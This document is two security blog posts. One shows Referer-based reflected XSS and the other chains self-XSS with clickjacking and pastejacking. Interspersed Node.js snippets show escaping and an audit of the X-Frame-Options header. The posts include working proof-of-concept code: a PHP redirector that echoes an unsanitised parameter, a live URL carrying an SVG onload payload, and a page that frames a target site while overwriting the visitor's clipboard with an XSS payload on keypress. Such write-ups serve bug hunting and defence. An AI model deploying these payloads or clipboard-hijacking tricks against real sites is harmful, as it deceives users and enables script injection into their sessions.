Exploiting unusual Referer based XSS

Hello Everyone,

I’m writing this after a long break. This post is about how one can exploit Referer-based XSS using a JavaScript-based redirection. This is nothing new, but I did not find enough resources when I was looking to exploit something similar in the past, so I thought I would summarise it quickly and share it with everyone.

What is referer based XSS?

This is like any other reflected XSS: the Referer value gets reflected into the response body without any sanitization. It happens when a web application uses the Referer value for a feature, tracking, etc.

Note:- By default browsers percent-encode the Referer URL, so this only applies where the application uses the URL-decoded Referer value.

Here is what the vulnerable page looks like:-

http://p0c.geekboy.ninja/rxss-demo.php
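
As an added example (not code from the original post), the following Node.js snippet shows the note above in action: the Referer a browser actually sends for the post's PoC link, the raw echo that stays inert, the URL-decoding sink that reflects the tag, and the escaped output that neutralises it. The function names and the `<p>` wrapper are assumptions.

```javascript
// Added example, not from the original post: why the Referer header only
// becomes a reflected-XSS sink once the application URL-decodes it, and what
// the safe output looks like. Node.js, no dependencies.

// The Referer a browser sends for a navigation from `url`: the WHATWG URL
// parser percent-encodes '<' and '>' in the path, as browsers do on the wire.
function browserReferer(url) {
  return new URL(url).href;
}

// Minimal HTML escaping for text placed between tags or in a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Echoing the header as received: the payload stays percent-encoded and inert
// (this is why the post says the sink needs a URL-decoded Referer).
function renderRaw(referer) {
  return '<p>You came from: ' + referer + '</p>';
}

// The vulnerable pattern of the demo page: URL-decode, then echo unescaped.
function renderVulnerable(referer) {
  return '<p>You came from: ' + decodeURIComponent(referer) + '</p>';
}

// Hardened: decoding is fine, but escape for the HTML context at output time.
function renderSafe(referer) {
  return '<p>You came from: ' + escapeHtml(decodeURIComponent(referer)) + '</p>';
}

// Does an executable tag survive into the markup? Simple marker for the demo.
function hasLiveTag(html) {
  return /<(svg|img|script)\b/i.test(html);
}

// Constructed input: the post's PoC link as the page the victim navigates from.
const POC_URL = 'http://p0c.geekboy.ninja/rxss.php/<svg/onload=alert(document.domain)>'
  + '?target=http://p0c.geekboy.ninja/rxss-demo.php';
```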

How to exploit?

To control the Referer header, one can redirect from a page one controls and append the XSS payload to the URI; here is the hosted version of the PoC in action.

http://p0c.geekboy.ninja/rxss.php/<svg/onload=alert(document.domain)>?target=http://p0c.geekboy.ninja/rxss-demo.php

Source code:-

<?php header('X-XSS-Protection: 0'); ?>
<!DOCTYPE html>
<html>
<head>
<title>Referer based XSS testing</title>
</head>
<body>
<script>window.location.replace('<?php echo $_GET['target']; ?>');</script>
</body>
</html>

Feel free to host it yourself or use the hosted version. Now go back and check whether you missed any XSS in a similar scenario.

Resources:-

https://www.gremwell.com/exploiting_xss_in_referer_header
https://medium.com/@arbazhussain/referer-based-xss-52aeff7b09e7

Happy Hacking!

Cross Site Scripting for Fun: PasteJacking

Hi Everyone,

A few weeks ago I found an issue which initially looked unexploitable: it was Self-XSS again, this time in a search box where users can search for books/documents. The XSS got triggered once we typed/pasted our payload into the search box via the application's auto-suggestion feature, but once the search completed it got blocked by the WAF at the backend. So the only way to trigger the XSS was the auto-suggestion feature, which only the user himself can do, so we can't do anything fancy here like THIS.

Possible Exploitation?

Chaining this with ClickJacking, right? I was lucky enough that the application had a strange behaviour: it set X-Frame-Options for non-authenticated users but not for authenticated users.

TIP: Look for those headers on every part of the application.
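
The inconsistency described above is easy to miss by hand. As an added example (not the author's code), this Node.js snippet classifies a response's framing policy from X-Frame-Options and CSP frame-ancestors and reports paths where the policy differs between an anonymous and an authenticated session, or is absent in both. The sample captures, paths and session labels are constructed.

```javascript
// Added example, not from the original post: classify one response's framing
// policy from its X-Frame-Options / CSP headers, then flag paths whose policy
// differs between sessions (the post found XFO only on unauthenticated pages).

// Returns 'blocked', 'same-origin' or 'frameable' for one response's headers.
function framingPolicy(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // CSP frame-ancestors overrides X-Frame-Options where supported, so check it first.
  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
  if (fa) {
    const src = fa.split(/\s+/).slice(1).map(s => s.replace(/^'|'$/g, '').toLowerCase());
    if (src.length === 0 || (src.length === 1 && src[0] === 'none')) return 'blocked';
    if (src.length === 1 && src[0] === 'self') return 'same-origin';
    return 'frameable'; // allow-list of other origins: review each entry by hand
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'blocked';
  if (xfo === 'SAMEORIGIN') return 'same-origin';
  return 'frameable'; // header missing, malformed, or the obsolete ALLOW-FROM
}

// samples: [{ path, session, headers }] for the same paths captured under different
// sessions. Reports paths whose policy differs across sessions or is frameable in all.
function auditFraming(samples) {
  const byPath = new Map();
  for (const s of samples) {
    if (!byPath.has(s.path)) byPath.set(s.path, {});
    byPath.get(s.path)[s.session] = framingPolicy(s.headers);
  }
  const findings = [];
  for (const [path, policies] of byPath) {
    const distinct = new Set(Object.values(policies));
    if (distinct.size > 1) findings.push({ path, issue: 'inconsistent', policies });
    else if (distinct.has('frameable')) findings.push({ path, issue: 'frameable', policies });
  }
  return findings;
}

// Constructed sample captures (not real responses) mirroring the post's case:
// the anonymous view of /home carries XFO, the authenticated view does not.
const SAMPLES = [
  { path: '/home', session: 'anonymous', headers: { 'X-Frame-Options': 'SAMEORIGIN' } },
  { path: '/home', session: 'authenticated', headers: { 'Content-Type': 'text/html' } },
  { path: '/login', session: 'anonymous', headers: { 'Content-Security-Policy': "frame-ancestors 'none'" } },
  { path: '/login', session: 'authenticated', headers: { 'Content-Security-Policy': "frame-ancestors 'none'" } },
];
```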

So I checked all the possible and more convincing ways to chain this; here are some ways we can do it.

  • Copy Paste
  • Drag and Drop
  • PasteJacking

Copy Paste:

In this, we simply ask the victim to copy-paste the payload from our hosted page into the framed page, which is not very convincing.

Drag and Drop:

In this, we can hide our payload behind an image or anything else and convince the victim to drag and drop the object into the framed page. This is a good vector indeed, but it didn't work in my case, as typing or pasting is the only way to trigger the XSS.

Reference:

  1. http://c0rni3sm.blogspot.in/2016/04/drag-drop-xss-in-google.html
  2. https://vishwarajbhattrai.wordpress.com/2016/02/04/exploiting-self-xss/
  3. Python script to generate POC for Drag and Drop XSS.

PasteJacking

This is what I used for my submission, and it is quite convincing to me: here we can control the victim's clipboard via JavaScript. Once the victim copies the object, which can be anything, the attacker can set anything on the victim's clipboard, so I set it to the XSS payload.

Reference:

1. https://github.com/dxa4481/Pastejacking

So I decided to use PasteJacking to exploit this Self-XSS, and this is how it looks:

TIP: You can use: http://samy.pl/quickjack/quickjack.html for framing/slicing desired section of the page.

PoC code:

<html>
<head>
<title>ClickJacking Lottery Game POC</title>
</head>
<body><center>
<h1>ClickJacking Lottery Game</h1>

<p><b>Can you copy me?</b></p>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");

//
// *** This styling is an extra step which is likely not required. ***
//
// Why is it here? To ensure:
// 1. the element is able to have focus and selection.
// 2. if element was to flash render it has minimal visual impact.
// 3. less flakyness with selection and copying which **might** occur if
// the textarea element is not visible.
//
// The likelihood is the element won't even render, not even a flash,
// so some of these are just precautions. However in IE the element
// is visible whilst the popup box asking the user for permission for
// the web page to copy to the clipboard.
//

// Place in top-left corner of screen regardless of scroll position.
textArea.style.position = 'fixed';
textArea.style.top = 0;
textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em
// doesn't work as this gives a negative w/h on some browsers.
textArea.style.width = '2em';
textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.
textArea.style.padding = 0;

// Clean up any borders.
textArea.style.border = 'none';
textArea.style.outline = 'none';
textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.
textArea.style.background = 'transparent';


textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {
var successful = document.execCommand('copy');
var msg = successful ? 'successful' : 'unsuccessful';
console.log('Copying text command was ' + msg);
} catch (err) {
console.log('Oops, unable to copy');
}

document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
var ms = 100;
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
copyTextToClipboard('<img src=x onerror=confirm(document.domain)>');
});

</script>


<script>function t(e){window.setTimeout("stop();",10);}window.onbeforeunload=t;var frames=new Array();</script>
<div qjid="quickjack" style="overflow: hidden; width: 304px; height: 38px; position: relative;" id="cksl6">
<iframe name="cksl7" src="https://www.target.com/home" style="border: 0pt none ; left: -875px; top: -8px; position: absolute; width: 1920px; height: 971px;" scrolling="no"></iframe></div>
&#8593; &#8593; &#8593; &#8593; &#8593; &#8593; <br><br>
<b>Paste here to WIN :)</b>
</center></body>
</html>

Limitations:

For exploiting issues like this, the application has to be vulnerable to ClickJacking.

Do let me know in the comments if you have exploited similar issues in more interesting ways; for any query, comment or ping me on Twitter. And yes, don’t blindly copy-paste anything from the internet.